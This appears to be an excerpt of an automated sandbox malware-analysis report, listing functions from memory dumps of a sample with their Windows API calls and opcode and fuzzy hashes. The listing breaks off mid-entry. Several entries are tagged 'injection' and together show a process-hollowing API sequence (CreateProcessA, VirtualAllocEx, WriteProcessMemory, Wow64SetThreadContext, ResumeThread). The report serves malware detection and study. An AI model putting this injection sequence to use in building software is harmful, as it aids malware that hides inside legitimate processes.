Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 09C8B287

Memory Dump Source

Source File: 00000008.00000002.1708507436.0000000009C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9c80000_tsnokiirph.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: af60db1efee9e1135369aea65522afc3ee3db165c2b05474944ebc886cdb69a9
Instruction ID: 7f17b7aa5874ee93b7588ef6ac01b67e759bfa2c865055817e6ea0398c9cf657
Opcode Fuzzy Hash: af60db1efee9e1135369aea65522afc3ee3db165c2b05474944ebc886cdb69a9
Instruction Fuzzy Hash: 79C138B0D0025D8FDB20DFA8D841BEEBBB1BF49304F0495AAE449B7250DB749A85CF95

Uniqueness

Uniqueness Score: -1.00%

Function 09C8AFC0 Relevance: 1.8, APIs: 1, Instructions: 321
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 09C8B287

Memory Dump Source

Source File: 00000008.00000002.1708507436.0000000009C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9c80000_tsnokiirph.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6897c6dc72ddd27ca116057534f09b07394df997b8083112f5f01608ff0b5296
Instruction ID: fa87826e5a705b9750bcdfe1873c003592ee7b9df36bfa69a0f1aa01541c2523
Opcode Fuzzy Hash: 6897c6dc72ddd27ca116057534f09b07394df997b8083112f5f01608ff0b5296
Instruction Fuzzy Hash: 03C138B0D0025D8FDB20DFA8D841BEEBBB1BF49304F0495AAE449B7250DB749A85CF95

Uniqueness

Uniqueness Score: -1.00%

Function 09C8A8B8 Relevance: 1.8, APIs: 1, Instructions: 299
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 09C8ABC2

Memory Dump Source

Source File: 00000008.00000002.1708507436.0000000009C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9c80000_tsnokiirph.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 581e682adca6a9b2e3de99700a19fda24c2875bca51082941a538a9c0b5e3716
Instruction ID: 30c83a430f2ee592a94ca6e5c8afd5d7a77b8ea57f9e5f297e4bf1034abaab7c
Opcode Fuzzy Hash: 581e682adca6a9b2e3de99700a19fda24c2875bca51082941a538a9c0b5e3716
Instruction Fuzzy Hash: E5B1BA70E041699FCB09DF6DC980AAEFBB2EF89304F14861AE415A7358C774AD41CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 05973A08 Relevance: 1.7, APIs: 1, Instructions: 227
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(?), ref: 05973C8A

Memory Dump Source

Source File: 00000008.00000002.1704545102.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5970000_tsnokiirph.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 1caecfb397c05414e0a7a4013bc1142086cd70019bae6acdcda6c104412e0473
Instruction ID: 3952ecbeb85724ea64c84e53f003591b1787a0dbf349e6b11b874e2cb132f5bd
Opcode Fuzzy Hash: 1caecfb397c05414e0a7a4013bc1142086cd70019bae6acdcda6c104412e0473
Instruction Fuzzy Hash: 67913470A00B099FDB24CF69D485BAABBF6FF88300F14892AE446E7750D730E945CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0597A704 Relevance: 1.7, APIs: 1, Instructions: 185
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0597A8D1

Memory Dump Source

Source File: 00000008.00000002.1704545102.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5970000_tsnokiirph.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: d6d040d833c0fe91a122ab41acf161a63cb7bf534e3b401478b63dc21e0e811c
Instruction ID: 9d2ef2f57d07a4e42e9cb5fa568829bbac6b6d31220def95b3e2db9aa5ad1146
Opcode Fuzzy Hash: d6d040d833c0fe91a122ab41acf161a63cb7bf534e3b401478b63dc21e0e811c
Instruction Fuzzy Hash: CC7169B4D05218DFDF60CFA9D984BDDBBB1BB09304F1491AAE848A7211D7349A85CF45

Uniqueness

Uniqueness Score: -1.00%

Function 0597A710 Relevance: 1.7, APIs: 1, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0597A8D1

Memory Dump Source

Source File: 00000008.00000002.1704545102.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5970000_tsnokiirph.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: f05b4305e5d4232535a0abf75fb7417fd8bdc3cc0629861a53ef3c32b7c4849e
Instruction ID: 44305cef96e9f5896875c9a1effa04efe71a4a9527f55c8991fb6a8603116897
Opcode Fuzzy Hash: f05b4305e5d4232535a0abf75fb7417fd8bdc3cc0629861a53ef3c32b7c4849e
Instruction Fuzzy Hash: 05717BB4D04258DFDF20CFA9C984BDEBBF1BB49304F1491AAE448A7211D7309A85CF45

Uniqueness

Uniqueness Score: -1.00%

Function 0323C884 Relevance: 1.6, APIs: 1, Instructions: 126COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 0323DE41

Memory Dump Source

Source File: 00000008.00000002.1701384058.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3230000_tsnokiirph.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 847a91f32376f0783a5f9d1c2bcae65638a3eddd13c7e94d02ea3a8cdadef723
Instruction ID: 2fd85abfddd0cb756d301fd8b92d45c73b027b0204fb0c23982cba7913af57f1
Opcode Fuzzy Hash: 847a91f32376f0783a5f9d1c2bcae65638a3eddd13c7e94d02ea3a8cdadef723
Instruction Fuzzy Hash: B251D6B1D0021DCFDB20DFA8C940BDEBBF5BF49300F10809AD549AB251DA756A89CF91

Uniqueness

Uniqueness Score: -1.00%

Function 09C8AC34 Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 09C8AD0B

Memory Dump Source

Source File: 00000008.00000002.1708507436.0000000009C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9c80000_tsnokiirph.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: ef7224d4ef6cf9e2dd6391e88a7132a0a950172e14dabc8e040c408715092044
Instruction ID: 37dc56a8a5fbe5420d552f659b5338e0c2756e202cecba1cbcdd3fb06598c743
Opcode Fuzzy Hash: ef7224d4ef6cf9e2dd6391e88a7132a0a950172e14dabc8e040c408715092044
Instruction Fuzzy Hash: 634199B5D012589FCF10CFA9D984AEEFBF1BB49314F24902AE819B7210C335AA45CF54

Uniqueness

Uniqueness Score: -1.00%

Function 09C8AC38 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 09C8AD0B

Memory Dump Source

Source File: 00000008.00000002.1708507436.0000000009C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9c80000_tsnokiirph.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 7b0cb2b1d695155ab31b4bdeb6c8c2d7b4fe151bfc1eb34c0bdcde2700704626
Instruction ID: 7d0cc7e3aac4b81107a18ff5d1fafb6ee5f4cb247b822b04b71484ea8bee3646
Opcode Fuzzy Hash: 7b0cb2b1d695155ab31b4bdeb6c8c2d7b4fe151bfc1eb34c0bdcde2700704626
Instruction Fuzzy Hash: 9F41AAB5D012589FCF00CFA9D984AEEFBF1BB49314F20902AE818B7210D735AA45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 09C8AD88 Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 09C8AE42

Memory Dump Source

Source File: 00000008.00000002.1708507436.0000000009C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9c80000_tsnokiirph.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 0a007da67a2100f28cd33299fa4a85aab91c48d1f4d9f6386e34ab83ea8a46b8
Instruction ID: a93ba4640643470efc8807c956411454a4a0bc6b7adea243ec0b1e2bfed02283
Opcode Fuzzy Hash: 0a007da67a2100f28cd33299fa4a85aab91c48d1f4d9f6386e34ab83ea8a46b8
Instruction Fuzzy Hash: EE41A7B5D00258DFCF10CFAAE880AEEFBB1BB49310F10942AE815B7210C735A945CF68

Uniqueness

Uniqueness Score: -1.00%

Function 05976019 Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 059760EB

Memory Dump Source

Source File: 00000008.00000002.1704545102.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5970000_tsnokiirph.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: b601c04356d783f2a07a8a55d1e6641ebce4981a870412803821ff1994b149e1
Instruction ID: 738d4be7c9e32de9161eb3b23dc6fae2fbd4550759dbcf4e0c6d7e5323513194
Opcode Fuzzy Hash: b601c04356d783f2a07a8a55d1e6641ebce4981a870412803821ff1994b149e1
Instruction Fuzzy Hash: 8A4144B9D002589FCF10CFA9D984ADEBBF5BB09310F14906AE918BB211D335A955CF54

Uniqueness

Uniqueness Score: -1.00%

Function 05976020 Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 059760EB

Memory Dump Source

Source File: 00000008.00000002.1704545102.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5970000_tsnokiirph.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: df88e26a45bf24c711a36662a9c8daea9e6047b37ed6ebebc718fa38f58ba39b
Instruction ID: 335f281b61381589db6735bdf686108518ba950dd15cdfa30f1a11737cb4e7fb
Opcode Fuzzy Hash: df88e26a45bf24c711a36662a9c8daea9e6047b37ed6ebebc718fa38f58ba39b
Instruction Fuzzy Hash: 874156B9D002589FCF10CFAAD984ADEBBF5BB49310F14906AE918BB311D335A945CF54

Uniqueness

Uniqueness Score: -1.00%

Function 09C8AD90 Relevance: 1.6, APIs: 1, Instructions: 106COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 09C8AE42

Memory Dump Source

Source File: 00000008.00000002.1708507436.0000000009C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9c80000_tsnokiirph.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: bdf16944ca6d934b4f369223ed4b266ec5bc39c50337df1b4338e0bbc3fa5b5e
Instruction ID: 06aa32023b5c227086f63fae8cab61f2c33146c9dbb4e100d482043498266716
Opcode Fuzzy Hash: bdf16944ca6d934b4f369223ed4b266ec5bc39c50337df1b4338e0bbc3fa5b5e
Instruction Fuzzy Hash: 4F41A8B5D00258DFCF10CFAAD880AEEFBB1BB49310F10942AE814B7210D735A945CF68

Uniqueness

Uniqueness Score: -1.00%

Function 09C8AB10 Relevance: 1.6, APIs: 1, Instructions: 105memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 09C8ABC2

Memory Dump Source

Source File: 00000008.00000002.1708507436.0000000009C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9c80000_tsnokiirph.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a4c6b8e6e0d8ffce7439455047b5a059b6b837b7b2b828654cd20612f73b0984
Instruction ID: 3c5674ed0efa6b795306633b8bb522226adf0bc6cf4f6714652e8f9b450e1673
Opcode Fuzzy Hash: a4c6b8e6e0d8ffce7439455047b5a059b6b837b7b2b828654cd20612f73b0984
Instruction Fuzzy Hash: 0631A8B8D00258DFCF10CFA9D984AEEFBB1BB49310F10942AE815B7210D735A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 05973700 Relevance: 1.6, APIs: 1, Instructions: 97libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(?,?,?), ref: 05973FB2

Memory Dump Source

Source File: 00000008.00000002.1704545102.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5970000_tsnokiirph.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 6be377da97415d92e0e6f90a7f1a6f93fdba48dda13ef5e5505ae84939ec1462
Instruction ID: 2e01c418f1eb45f962c92f96f5918c63244f1493867aa83bde7aa8761724c3d3
Opcode Fuzzy Hash: 6be377da97415d92e0e6f90a7f1a6f93fdba48dda13ef5e5505ae84939ec1462
Instruction Fuzzy Hash: 064177B4D042599FDB10CFAAD584A9EFBF5BB49310F14942AE828BB320D334A945CF95

Uniqueness

Uniqueness Score: -1.00%

Function 05979C04 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 0597CF41

Memory Dump Source

Source File: 00000008.00000002.1704545102.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5970000_tsnokiirph.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: f9b13789880881c6dfc8ac1d963c88b81c5be2b61ed0a6209e39356b45a8fcfd
Instruction ID: 54f5a420d126ec4531995befad3ea7943b43abf09abda353e4f4a3f2bbacfe12
Opcode Fuzzy Hash: f9b13789880881c6dfc8ac1d963c88b81c5be2b61ed0a6209e39356b45a8fcfd
Instruction Fuzzy Hash: B841F7B4900349DFCB14CF99C488AAABBF5FF88314F24C459E519AB321D775A941CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 032384E0 Relevance: 1.6, APIs: 1, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 0323858F

Memory Dump Source

Source File: 00000008.00000002.1701384058.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3230000_tsnokiirph.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 7cb34594617ba772d29d906212403737dc2851266a76f98b1de87f2beabe63e9
Instruction ID: fabff7e0976a55c78d9254d50c601312a6a5055dbb2a499982dd442767ac8f38
Opcode Fuzzy Hash: 7cb34594617ba772d29d906212403737dc2851266a76f98b1de87f2beabe63e9
Instruction Fuzzy Hash: D3319AB5D042589FCB10CFA9D484ADEFBB1AF59310F24902AE854BB210D375A985CF64

Uniqueness

Uniqueness Score: -1.00%

Function 09C8A788 Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 09C8A83F

Memory Dump Source

Source File: 00000008.00000002.1708507436.0000000009C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9c80000_tsnokiirph.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 7454c98224b62a7b8eba57ca37468a908007bd6a334562cb83752fda742b630d
Instruction ID: 4f9f0c0a14e875729e4993150086cafaab3d85de5ff67f7cc35ef0ca21896c79
Opcode Fuzzy Hash: 7454c98224b62a7b8eba57ca37468a908007bd6a334562cb83752fda742b630d
Instruction Fuzzy Hash: C041BBB5D01258DFCB14DFA9D484AEEFBF1BB49314F24802AE415B7250C738A98ACF64

Uniqueness

Uniqueness Score: -1.00%

Function 05973F00 Relevance: 1.6, APIs: 1, Instructions: 95libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(?,?,?), ref: 05973FB2

Memory Dump Source

Source File: 00000008.00000002.1704545102.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5970000_tsnokiirph.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 035dd702f7d08eaef79db81a4db2e6d3fc51e6cb01e698ad2164b70cd6409cca
Instruction ID: a7385525cf3c7e3c7678c46a2f430dbe7768a2e3aca74e7f791773c266e37d17
Opcode Fuzzy Hash: 035dd702f7d08eaef79db81a4db2e6d3fc51e6cb01e698ad2164b70cd6409cca
Instruction Fuzzy Hash: C34187B8D01259DFDB10CFA9D984AAEFBF5BB48310F14942AE828B7324D335A945CF54

Uniqueness

Uniqueness Score: -1.00%

Function 09C8A790 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 09C8A83F

Memory Dump Source

Source File: 00000008.00000002.1708507436.0000000009C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9c80000_tsnokiirph.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: a082075e496722db6afbc2e3a538acc6e99bee5219e96fbfdeb51ad0a08a5d4f
Instruction ID: 42fe0bfad032aa4224edb8189a5ca4add3a7942d81d2d89e2cd84b7b7345b4a9
Opcode Fuzzy Hash: a082075e496722db6afbc2e3a538acc6e99bee5219e96fbfdeb51ad0a08a5d4f
Instruction Fuzzy Hash: DB31AEB5D012589FCB10DFAAD584AEEFBF1BF49314F14802AE414B7250D738A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 09C8BDF2 Relevance: 1.6, APIs: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 09C8D03B

Memory Dump Source

Source File: 00000008.00000002.1708507436.0000000009C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9c80000_tsnokiirph.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 1cdc80a37b5b83e63f17c7647f514b95e78dcba147eac956bd21eb0c656f4224
Instruction ID: dc825ad47dc23dfc70cfc5bc598cdfcf94f2d8acfa5253fb0dbbb9205a5f0c01
Opcode Fuzzy Hash: 1cdc80a37b5b83e63f17c7647f514b95e78dcba147eac956bd21eb0c656f4224
Instruction Fuzzy Hash: D131A8B9D00258EFCB10CFA9E480ADEFBF4AB19314F24902AE814BB350D335A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 09C8BD78 Relevance: 1.6, APIs: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 09C8D03B

Memory Dump Source

Source File: 00000008.00000002.1708507436.0000000009C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9c80000_tsnokiirph.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 41c2cc40fd2846edf7d63b59f4380f97acf501a7d731244c56fdd0bae995acd3
Instruction ID: 35d0725cd293ebdc4b977a02d42442654dab76b99264522d50b163c29edcef46
Opcode Fuzzy Hash: 41c2cc40fd2846edf7d63b59f4380f97acf501a7d731244c56fdd0bae995acd3
Instruction Fuzzy Hash: D831A8B8D042589FCB10CF99E484ADEFBF0AB09314F10902AE814BB350D335A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 09C8CF99 Relevance: 1.6, APIs: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 09C8D03B

Memory Dump Source

Source File: 00000008.00000002.1708507436.0000000009C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9c80000_tsnokiirph.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: e4c0071b7b9fd47e6ecef3c78b4cc06603c70b6b8bc245c30cd28d57ef53fe59
Instruction ID: 4088f4534b64603521e6792233c7a11d0d87e09e569ce25bb5a8c3ce4cfb8a23
Opcode Fuzzy Hash: e4c0071b7b9fd47e6ecef3c78b4cc06603c70b6b8bc245c30cd28d57ef53fe59
Instruction Fuzzy Hash: 5E31A8B8D002589FCB14CFA9E484ADEFBF0BB49310F20902AE814BB360D335A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 09C8A698 Relevance: 1.6, APIs: 1, Instructions: 76threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 09C8A71E

Memory Dump Source

Source File: 00000008.00000002.1708507436.0000000009C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9c80000_tsnokiirph.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 18397e3afbceff04325e27c3fe0145663630759ab01cad7ebb626e395bbf410b
Instruction ID: 12ebe2a47157668d0b51429e1ddc223ea920ff5ba35f6cfa0d3568c6b88c93da
Opcode Fuzzy Hash: 18397e3afbceff04325e27c3fe0145663630759ab01cad7ebb626e395bbf410b
Instruction Fuzzy Hash: E631C9B4D012589FCF14CFA9E980AEEFBB5BB89314F20942AE815B7310C734A941CF54

Uniqueness

Uniqueness Score: -1.00%

Function 05973BF8 Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(?), ref: 05973C8A

Memory Dump Source

Source File: 00000008.00000002.1704545102.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5970000_tsnokiirph.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 8043dd09ba667fc54ec7c64fe824e23bc3654b55606f7670b106236e59844e84
Instruction ID: 7f687b2b76854f1d6d89629093ac5e7100d914b4720be3921542ab7ebddaabf0
Opcode Fuzzy Hash: 8043dd09ba667fc54ec7c64fe824e23bc3654b55606f7670b106236e59844e84
Instruction Fuzzy Hash: 7531A8B4D002589FCB14CFAAD484ADEFBF5AB49314F24906AE818B7320D334A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 09C8A6A0 Relevance: 1.6, APIs: 1, Instructions: 73threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 09C8A71E

Memory Dump Source

Source File: 00000008.00000002.1708507436.0000000009C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9c80000_tsnokiirph.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: c7de279079576c161d0ff253c7d5f6396338775384d021e2daa08205358b98f8
Instruction ID: db0d60ac1a872bd012c72d67bbb9bab6f1b7e7bf182963c448dc66425123d409
Opcode Fuzzy Hash: c7de279079576c161d0ff253c7d5f6396338775384d021e2daa08205358b98f8
Instruction Fuzzy Hash: 7831ACB4D012589FCB14DFAAE984ADEFBB5AB49314F10942AE415B7310C735A941CF94

Uniqueness

Uniqueness Score: -1.00%

Function 019ED4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1700140414.00000000019ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 019ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_19ed000_tsnokiirph.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 933b2abd86d0296aada18c18be8871d72ee7d36644418b0f9383c9fdb48e5055
Instruction ID: f99661f5aa193d4475b96dd0a6159f9d70e2d5521911d7c4ed4b69140866ed00
Opcode Fuzzy Hash: 933b2abd86d0296aada18c18be8871d72ee7d36644418b0f9383c9fdb48e5055
Instruction Fuzzy Hash: DB212571504240DFDB06DF58D9C8F2ABFE5FB88318F20C569E9090B25AC736D456CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 031AD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1701027969.00000000031AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 031AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_31ad000_tsnokiirph.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce1bf5ccfe23edb53417867b12365bb8de4425f6c5e701be72ce612fd3845b40
Instruction ID: f4f9141443ba9743fc8934b0e208a2a4ca91b045d4e3271c8303c4f25d2d278b
Opcode Fuzzy Hash: ce1bf5ccfe23edb53417867b12365bb8de4425f6c5e701be72ce612fd3845b40
Instruction Fuzzy Hash: 8F216478204A00DFCB14DF28EAD0B26BFA5FB88315F24C5ADD80A4B656C33AC447DA61

Uniqueness

Uniqueness Score: -1.00%

Function 031AD1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1701027969.00000000031AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 031AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_31ad000_tsnokiirph.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afddd0c7d273ea833ec06c94a3bb85f407847ee00aa63c61f21c3af47b1e54cf
Instruction ID: b71b84004c273b7f67165fa898a35f170192995b308d3475621f3e94f98fc6f0
Opcode Fuzzy Hash: afddd0c7d273ea833ec06c94a3bb85f407847ee00aa63c61f21c3af47b1e54cf
Instruction Fuzzy Hash: 75214979504A00DFCB05DF18E5D0B26BBA5FB8C315F24C5AEE8094B652C336D446CA61

Uniqueness

Uniqueness Score: -1.00%

Function 031AD006 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1701027969.00000000031AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 031AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_31ad000_tsnokiirph.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a1b99be698b03241364e29ab3f8e1aca3002d8dec3966fc271f6acdb3816dab
Instruction ID: baac73669003b3bdd2a294f36fac7099c21ef11b9f01e75d63efc18038e5115a
Opcode Fuzzy Hash: 6a1b99be698b03241364e29ab3f8e1aca3002d8dec3966fc271f6acdb3816dab
Instruction Fuzzy Hash: EA21A4755087809FCB02CF24D994711BF75EF4A314F28C5DAD8498F6A7C33A981ADB62

Uniqueness

Uniqueness Score: -1.00%

Function 019ED4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1700140414.00000000019ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 019ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_19ed000_tsnokiirph.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: 1e9cadecea61de38dfd28d8c75690eeba15b76aadab0ccd30d528080fadb8965
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: 58110376404280CFDB02CF54D9C4B16BFB1FB84318F24C6AAD8090B25BC336D45ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 031AD1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

